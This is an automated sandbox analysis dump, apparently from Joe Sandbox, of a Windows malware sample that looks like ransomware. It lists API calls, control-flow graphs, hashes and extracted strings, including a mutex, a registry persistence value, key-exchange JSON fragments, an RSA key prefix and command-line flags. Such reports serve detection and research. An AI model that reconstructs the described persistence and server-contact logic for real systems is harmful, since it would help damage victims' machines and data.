__except_handler4 45045->45063 45047->45025 45048 45d55f 45048->45047 45064 45a5e0 101 API calls __except_handler4 45048->45064 45051 48247a __write_nolock 45050->45051 45052 4824c3 GetTickCount 45051->45052 45053 482483 QueryPerformanceCounter 45051->45053 45054 4824d6 __write_nolock 45052->45054 45055 482499 __write_nolock 45053->45055 45056 482492 45053->45056 45057 45d550 101 API calls 45054->45057 45058 45d550 101 API calls 45055->45058 45056->45052 45059 4824ea 45057->45059 45060 4824b7 45058->45060 45061 482244 GlobalMemoryStatus 45059->45061 45060->45052 45060->45061 45061->44994 45062->44988 45063->45048 45064->45047
                APIs
                  • Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
                  • Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                  • Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                • GetCurrentProcess.KERNEL32 ref: 00419FC4
                • GetLastError.KERNEL32 ref: 00419FD2
                • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
                • GetLastError.KERNEL32 ref: 00419FE4
                • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,0063AE48,?), ref: 0041A0BB
                • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
                • GetCommandLineW.KERNEL32(?,?), ref: 0041A161
                  • Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                  • Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
                  • Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                • String ID: IsNotAutoStart$ IsNotTask$%username%$-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA9TLHfuwgL1EtGNw\/w5eV\\nWD5bVX7I4cOUSxyG7YpbAlG$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
                • API String ID: 2957410896-3960997988
                • Opcode ID: ece388c1392aa53db8eaa3cba44b4948b4c1e94812cf73a43917909b128c960b
                • Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
                • Opcode Fuzzy Hash: ece388c1392aa53db8eaa3cba44b4948b4c1e94812cf73a43917909b128c960b
                • Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 606 481920-4819e0 call 42f7c0 GetVersionExA LoadLibraryA * 3 609 481a0b-481a0d 606->609 610 4819e2-481a05 GetProcAddress * 2 606->610 611 481aba-481ac2 609->611 612 481a13-481a15 609->612 610->609 613 481acb-481ad3 611->613 614 481ac4-481ac5 FreeLibrary 611->614 612->611 615 481a1b-481a31 NetStatisticsGet 612->615 616 481b0d 613->616 617 481ad5-481b0b GetProcAddress * 3 613->617 614->613 618 481a69-481a85 NetStatisticsGet 615->618 619 481a33-481a5d call 42f7c0 call 45d550 615->619 621 481b0f-481b17 616->621 617->621 618->611 620 481a87-481aae call 42f7c0 call 45d550 618->620 619->618 620->611 625 481c0a-481c12 621->625 626 481b1d-481b23 621->626 629 481c1b-481c22 625->629 630 481c14-481c15 FreeLibrary 625->630 626->625 627 481b29-481b2b 626->627 627->625 633 481b31-481b47 627->633 635 481c31-481c44 LoadLibraryA 629->635 636 481c24-481c2b call 4549a0 629->636 630->629 650 481b98-481baa 633->650 651 481b49-481b5d 633->651 637 481c4a-481c82 GetProcAddress * 3 635->637 638 481d4b-481d53 635->638 636->635 636->638 645 481caf-481cb7 637->645 646 481c84 637->646 641 481d59-481e56 GetProcAddress * 12 638->641 642 48223f-482256 call 482470 GlobalMemoryStatus call 42f7c0 638->642 647 481e5c-481e63 641->647 648 482233-482239 FreeLibrary 641->648 669 48225b-4822cd call 45d550 GetCurrentProcessId call 42f7c0 call 45d550 call 42a77e 642->669 652 481cb9-481cc0 645->652 653 481d06-481d08 645->653 656 481c86-481cac call 42f7c0 call 45d550 646->656 647->648 654 481e69-481e70 647->654 648->642 661 481bb2-481bb4 650->661 670 481b8a-481b8c 651->670 671 481b5f-481b84 call 42f7c0 call 45d550 651->671 659 481ccb-481ccd 652->659 660 481cc2-481cc9 652->660 657 481d0a-481d3c call 42f7c0 call 45d550 653->657 658 481d3f-481d45 FreeLibrary 653->658 654->648 662 481e76-481e7d 654->662 656->645 657->658 658->638 659->653 666 481ccf-481cde 659->666 660->653 660->659 661->625 667 481bb6-481bca 661->667 662->648 668 481e83-481e8a 662->668 666->653 680 481ce0-481d03 call 42f7c0 call 45d550 666->680 688 481bfc-481bfe 667->688 689 481bcc-481bf6 call 42f7c0 call 45d550 667->689 668->648 675 481e90-481e97 668->675 670->650 671->670 675->648 682 481e9d-481ea4 675->682 680->653 682->648 690 481eaa-481eb1 682->690 688->625 689->688 690->648 696 481eb7-481ebe 690->696 696->648 702 481ec4-481ecb 696->702 702->648 706 481ed1-481ed3 702->706 706->648 709 481ed9-481eea CreateToolhelp32Snapshot 706->709 709->648 711 481ef0-481f01 709->711 713 481f03-481f0f GetTickCount 711->713 714 481f15-481f22 Heap32ListFirst 711->714 713->714 715 481f28-481f2d 714->715 716 482081-482093 714->716 717 481f33-481f9d call 42f7c0 call 45d550 Heap32First 715->717 718 48209d-4820b2 Process32First 716->718 719 482095-482097 GetTickCount 716->719 734 481f9f-481faa 717->734 735 482015-482060 Heap32ListNext 717->735 721 48210a-482116 718->721 722 4820b4-4820f5 call 42f7c0 call 45d550 718->722 719->718 723 482118-48211a GetTickCount 721->723 724 482120-482135 721->724 722->721 751 4820f7-4820f9 722->751 723->724 732 482196-4821a2 724->732 733 482137 724->733 737 4821ac-4821c1 732->737 738 4821a4-4821a6 GetTickCount 732->738 740 482140-482181 call 42f7c0 call 45d550 733->740 741 481fb0-481feb call 42f7c0 call 45d550 Heap32Next 734->741 735->716 742 482062-482064 735->742 752 482219-482227 737->752 753 4821c3-482204 call 42f7c0 call 45d550 737->753 738->737 740->732 771 482183-482185 740->771 763 481fed-481fef 741->763 764 48200f 741->764 746 482079-48207b 742->746 747 482066-482077 GetTickCount 742->747 746->716 746->717 747->716 747->746 751->722 756 4820fb-482108 GetTickCount 751->756 760 482229-48222b 752->760 761 48222d CloseHandle 752->761 753->752 774 482206-482208 753->774 756->721 756->722 760->648 761->648 768 481ff1-482002 GetTickCount 763->768 769 482004-48200d 763->769 764->735 768->764 768->769 769->741 769->764 771->740 772 482187-482194 GetTickCount 771->772 772->732 772->740 774->753 775 48220a-482217 GetTickCount 774->775 775->752 775->753
                APIs
                • GetVersionExA.KERNEL32(00000094), ref: 00481983
                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00481994
                • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004819A1
                • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 004819AE
                • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 004819E8
                • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 004819FB
                • NetStatisticsGet.NETAPI32(00000000,LanmanWorkstation,00000000,00000000,?), ref: 00481A2D
                • NetStatisticsGet.NETAPI32(00000000,LanmanServer,00000000,00000000,?), ref: 00481A81
                • FreeLibrary.KERNEL32(?), ref: 00481AC5
                • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00481ADB
                • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00481AEE
                • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00481B01
                • FreeLibrary.KERNEL32(?), ref: 00481C15
                • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00481C36
                • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00481C50
                • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00481C63
                • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00481C76
                • FreeLibrary.KERNEL32(?), ref: 00481D45
                • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00481D73
                • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00481D86
                • GetProcAddress.KERNEL32(?,Heap32First), ref: 00481D99
                • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00481DAC
                • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00481DBF
                • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00481DD2
                • GetProcAddress.KERNEL32(?,Process32First), ref: 00481DE5
                • GetProcAddress.KERNEL32(?,Process32Next), ref: 00481DF8
                • GetProcAddress.KERNEL32(?,Thread32First), ref: 00481E0B
                • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00481E1E
                • GetProcAddress.KERNEL32(?,Module32First), ref: 00481E31
                • GetProcAddress.KERNEL32(?,Module32Next), ref: 00481E44
                • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00481EDD
                • GetTickCount.KERNEL32 ref: 00481F03
                • Heap32ListFirst.KERNEL32(00000000,00000010), ref: 00481F1A
                • Heap32First.KERNEL32(00000024,?,?), ref: 00481F95
                • Heap32Next.KERNEL32(?,?,?,?,?,3947B7DD), ref: 00481FE3
                • GetTickCount.KERNEL32 ref: 00481FF1
                • Heap32ListNext.KERNEL32(?,?), ref: 00482058
                • GetTickCount.KERNEL32 ref: 00482066
                • GetTickCount.KERNEL32 ref: 00482095
                • Process32First.KERNEL32(?,00000128), ref: 004820AA
                • GetTickCount.KERNEL32 ref: 004820FB
                • GetTickCount.KERNEL32 ref: 00482118
                • GetTickCount.KERNEL32 ref: 00482187
                • GetTickCount.KERNEL32 ref: 004821A4
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$CountTick$Library$Heap32Load$FirstFree$ListNextStatistics$CreateProcess32SnapshotToolhelp32Version
                • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                • API String ID: 4174345323-1723836103
                • Opcode ID: fea07ce2f0117be6352bc301b8b84ac92ab27d7aecf4f5d53a5a37b6a16b1baf
                • Instruction ID: 1a290f2a1335d0d3a86819d1d60d6f49a84e0195e1de194fff26f42f4ca9d5b3
                • Opcode Fuzzy Hash: fea07ce2f0117be6352bc301b8b84ac92ab27d7aecf4f5d53a5a37b6a16b1baf
                • Instruction Fuzzy Hash: 683273B0E002299ADB61AF64CC45B9EB6B9FF45704F0045EBE60CE6151EB788E84CF5D

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 776 41e690-41e6d8 call 42f7c0 timeGetTime call 423f74 call 40c6a0 783 41e6e0-41e6e6 776->783 784 41e6f0-41e722 call 42b420 call 40c500 783->784 789 41e724-41e729 784->789 790 41e72e-41e772 InternetOpenW 784->790 793 41ea1f-41ea40 call 423cf0 789->793 791 41e774-41e776 790->791 792 41e778-41e77d 790->792 794 41e78f-41e7b8 call 415ae0 call 421c02 791->794 795 41e780-41e789 792->795 800 41ea42-41ea46 793->800 801 41ea8d-41eacc lstrlenA lstrcpyA * 2 lstrlenA 793->801 816 41e882-41e8e5 call 415ae0 call 413ff0 call 412900 call 4159d0 794->816 817 41e7be-41e7f7 call 414690 call 40dd40 794->817 795->795 797 41e78b-41e78d 795->797 797->794 803 41ee2a-41ee3a call 411b10 800->803 804 41ea4c-41ea61 SHGetFolderPathA 800->804 805 41eaef-41eb12 801->805 806 41eace 801->806 824 41ee4d-41ee82 call 40ef50 803->824 825 41ee3c-41ee3f 803->825 804->784 808 41ea67-41ea88 PathAppendA DeleteFileA 804->808 812 41eb14-41eb16 805->812 813 41eb18-41eb1f 805->813 809 41ead0-41ead8 806->809 808->784 814 41eaeb 809->814 815 41eada-41eae7 lstrlenA 809->815 819 41eb2b-41eb4f call 4156d0 call 412900 812->819 820 41eb22-41eb27 813->820 814->805 815->809 822 41eae9 815->822 873 41e8f3-41e917 lstrcpyW 816->873 874 41e8e7-41e8f0 call 422587 816->874 845 41e7f9-41e7fe 817->845 846 41e86f-41e874 817->846 843 41eb51 819->843 844 41eb53-41eb66 lstrcpyW 819->844 820->820 827 41eb29 820->827 822->805 836 41ee86-41ee8c 824->836 825->783 827->819 840 41ee92-41ee94 836->840 841 41ee8e-41ee90 836->841 851 41ee97-41ee9c 840->851 849 41eea0-41eeaf call 413ea0 841->849 843->844 852 41eb74-41ebe4 lstrlenA call 420c62 call 42b420 MultiByteToWideChar lstrcpyW call 423cf0 844->852 853 41eb68-41eb71 call 422587 844->853 847 41e800-41e809 call 422587 845->847 848 41e80c-41e827 845->848 846->816 854 41e876-41e87f call 422587 846->854 847->848 856 41e842-41e848 848->856 857 41e829-41e82d 848->857 849->836 875 41eeb1-41eee3 call 40ef50 849->875 851->851 859 41ee9e 851->859 896 41ebe6-41ebea 852->896 897 41ec3d-41ec97 lstrlenW lstrlenA lstrcpyA * 2 lstrlenA 852->897 853->852 854->816 866 41e84e-41e86c 856->866 865 41e82f-41e840 call 4205a0 857->865 857->866 859->849 865->866 866->846 879 41e943-41e97a InternetOpenUrlW InternetReadFile 873->879 880 41e919-41e920 873->880 874->873 895 41eee7-41eeed 875->895 883 41e9ec-41ea08 InternetCloseHandle * 2 879->883 884 41e97c-41e994 SHGetFolderPathA 879->884 880->879 886 41e922-41e92e 880->886 891 41ea16-41ea19 883->891 892 41ea0a-41ea13 call 422587 883->892 884->883 890 41e996-41e9c2 PathAppendA call 4220b6 884->890 893 41e930-41e935 886->893 894 41e937 886->894 890->883 913 41e9c4-41e9e4 lstrlenA call 422b02 call 423a38 890->913 891->793 892->891 900 41e93c-41e93d lstrcatW 893->900 894->900 901 41eef3-41eef5 895->901 902 41eeef-41eef1 895->902 896->803 904 41ebf0-41ec11 SHGetFolderPathA 896->904 906 41ec99 897->906 907 41ecbf-41ecdd 897->907 900->879 903 41eef8-41eefd 901->903 909 41ef01-41ef10 call 413ea0 902->909 903->903 910 41eeff 903->910 904->784 911 41ec17-41ec38 PathAppendA DeleteFileA 904->911 914 41eca0-41eca8 906->914 915 41ece3-41eced 907->915 916 41ecdf-41ece1 907->916 909->895 924 41ef12-41ef4c call 413ff0 call 412900 909->924 910->909 911->783 933 41e9e9 913->933 919 41ecbb 914->919 920 41ecaa-41ecb7 lstrlenA 914->920 922 41ecf0-41ecf5 915->922 921 41ecf9-41ed1b call 4156d0 call 412900 916->921 919->907 920->914 926 41ecb9 920->926 936 41ed1d 921->936 937 41ed1f-41ed35 lstrcpyW 921->937 922->922 927 41ecf7 922->927 941 41ef50-41ef68 lstrcpyW 924->941 942 41ef4e 924->942 926->907 927->921 933->883 936->937 939 41ed43-41edab lstrlenA call 420c62 call 42b420 MultiByteToWideChar lstrcpyW lstrlenW 937->939 940 41ed37-41ed40 call 422587 937->940 957 41edad-41edb6 lstrlenW 939->957 958 41edbc-41edc1 939->958 940->939 945 41ef76-41efb3 call 413ff0 call 412900 941->945 946 41ef6a-41ef73 call 422587 941->946 942->941 961 41efb5 945->961 962 41efb7-41efc6 lstrcpyW 945->962 946->945 957->958 963 41ee44-41ee48 957->963 959 41ee10-41ee12 958->959 960 41edc3-41ede4 SHGetFolderPathA 958->960 965 41ee14-41ee15 call 420bed 959->965 966 41ee1d-41ee1f 959->966 960->784 964 41edea-41ee0b PathAppendA DeleteFileA 960->964 961->962 967 41efd4-41efe0 962->967 968 41efc8-41efd1 call 422587 962->968 969 41f01a-41f030 963->969 964->783 975 41ee1a 965->975 966->803 971 41ee21-41ee27 call 420bed 966->971 973 41efe2-41efeb call 422587 967->973 974 41efee-41f008 967->974 968->967 971->803 973->974 979 41f016 974->979 980 41f00a-41f013 call 422587 974->980 975->966 979->969 980->979
                APIs
                • timeGetTime.WINMM(?,?,?,?,?,004CB3EC,000000FF), ref: 0041E6C0
                  • Part of subcall function 0040C6A0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,0041E6D4), ref: 0040C6C2
                  • Part of subcall function 0040C6A0: RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                  • Part of subcall function 0040C6A0: RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                • _memset.LIBCMT ref: 0041E707
                  • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0040C51B
                • InternetOpenW.WININET ref: 0041E743
                • _wcsstr.LIBCMT ref: 0041E7AE
                • _memmove.LIBCMT ref: 0041E838
                • lstrcpyW.KERNEL32(?,?), ref: 0041E90A
                • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                • _strstr.LIBCMT ref: 0041EA36
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                • DeleteFileA.KERNEL32(?), ref: 0041EA82
                • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                • lstrlenA.KERNEL32(?), ref: 0041EAC8
                • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
                • lstrlenA.KERNEL32(?), ref: 0041EB7C
                • _malloc.LIBCMT ref: 0041EB86
                • _memset.LIBCMT ref: 0041EB94
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
                • _strstr.LIBCMT ref: 0041EBDA
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                • DeleteFileA.KERNEL32(?), ref: 0041EC32
                • lstrlenW.KERNEL32(?), ref: 0041EC3E
                • lstrlenA.KERNEL32(","id":"), ref: 0041EC51
                • lstrcpyA.KERNEL32(?,?), ref: 0041EC6D
                • lstrcpyA.KERNEL32(?,?), ref: 0041EC7F
                • lstrlenA.KERNEL32(?), ref: 0041EC93
                • lstrlenA.KERNEL32(00000022), ref: 0041ECB3
                • lstrcpyW.KERNEL32(?,00000000), ref: 0041ED2A
                • lstrlenA.KERNEL32(?), ref: 0041ED4B
                • _malloc.LIBCMT ref: 0041ED55
                • _memset.LIBCMT ref: 0041ED63
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 0041ED7D
                • lstrcpyW.KERNEL32(?,00000000), ref: 0041ED85
                • lstrlenW.KERNEL32(?), ref: 0041EDA3
                • lstrlenW.KERNEL32(?), ref: 0041EDAE
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EDD3
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EDF7
                • DeleteFileA.KERNEL32(?), ref: 0041EE05
                • _free.LIBCMT ref: 0041EE15
                • _free.LIBCMT ref: 0041EE22
                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EF61
                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EFBF
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
                • String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
                • API String ID: 704684250-3586605218
                • Opcode ID: 3584184290279f3c6bb27f5462179e137b0acfeecfca1a72602efbcfcecb83fb
                • Instruction ID: 6dbc96f3ccd93c00a013485041b5c7257b0a9ae09bebbc57280f72cccf7ce4d8
                • Opcode Fuzzy Hash: 3584184290279f3c6bb27f5462179e137b0acfeecfca1a72602efbcfcecb83fb
                • Instruction Fuzzy Hash: FA421771508341ABD720DF25DC45BDB7BE8BF85308F44092EF88587292DB78E589CB9A

                Control-flow Graph

                APIs
                • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
                • __CxxThrowException@8.LIBCMT ref: 00411026
                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F26B,?,?,00000000,?,?,?,?,0044F26B,?,005081FC,?), ref: 00430F1F
                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
                • __CxxThrowException@8.LIBCMT ref: 00411051
                • lstrlenA.KERNEL32(?,00000000), ref: 00411059
                • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
                • __CxxThrowException@8.LIBCMT ref: 0041107A
                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
                • __CxxThrowException@8.LIBCMT ref: 004110AB
                • _memset.LIBCMT ref: 004110CA
                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
                • __CxxThrowException@8.LIBCMT ref: 004110F0
                • _malloc.LIBCMT ref: 00411100
                • _memset.LIBCMT ref: 0041110B
                • _sprintf.LIBCMT ref: 0041112E
                • lstrcatA.KERNEL32(?,?), ref: 0041113C
                • CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                • String ID: %.2X
                • API String ID: 2451520719-213608013
                • Opcode ID: a8141304a60413301b381e7f67b2687e8be80f1a018e77d3145a66e7fd92a87e
                • Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
                • Opcode Fuzzy Hash: a8141304a60413301b381e7f67b2687e8be80f1a018e77d3145a66e7fd92a87e
                • Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9
                APIs
                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
                  • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
                • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF,?,00000000), ref: 0040F900
                • _memmove.LIBCMT ref: 0040F9EA
                • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
                • _memmove.LIBCMT ref: 0040FADA
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                • String ID:
                • API String ID: 273148273-0
                • Opcode ID: 47b44beea8a2fcb99ab9c37f0240eed0577bdca43103a854fef3c9f526ca360d
                • Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
                • Opcode Fuzzy Hash: 47b44beea8a2fcb99ab9c37f0240eed0577bdca43103a854fef3c9f526ca360d
                • Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1515 40e870-40e8d6 call 4156d0 CryptAcquireContextW 1518 40e8d8-40e8e4 call 430eca 1515->1518 1519 40e8e9-40e901 CryptCreateHash 1515->1519 1518->1519 1521 40e903-40e90f call 430eca 1519->1521 1522 40e914-40e930 CryptHashData 1519->1522 1521->1522 1523 40e932-40e93e call 430eca 1522->1523 1524 40e943-40e961 CryptGetHashParam 1522->1524 1523->1524 1527 40e963-40e96f call 430eca 1524->1527 1528 40e974-40e9a6 call 420be4 call 42b420 CryptGetHashParam 1524->1528 1527->1528 1534 40e9a8-40e9b4 call 430eca 1528->1534 1535 40e9b9-40e9bb 1528->1535 1534->1535 1537 40e9c0-40e9c3 1535->1537 1538 40ea10-40ea31 call 422110 CryptDestroyHash CryptReleaseContext 1537->1538 1539 40e9c5-40e9df call 4204a6 1537->1539 1546 40ea33-40ea3b call 422587 1538->1546 1547 40ea3e-40ea50 1538->1547 1544 40e9e1-40e9f0 call 413ea0 1539->1544 1545 40e9f2-40e9f5 1539->1545 1544->1537 1549 40e9f8-40e9fd 1545->1549 1546->1547 1549->1549 1552 40e9ff-40ea0e call 413ea0 1549->1552 1552->1537
                APIs
                • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
                • __CxxThrowException@8.LIBCMT ref: 0040E8E4
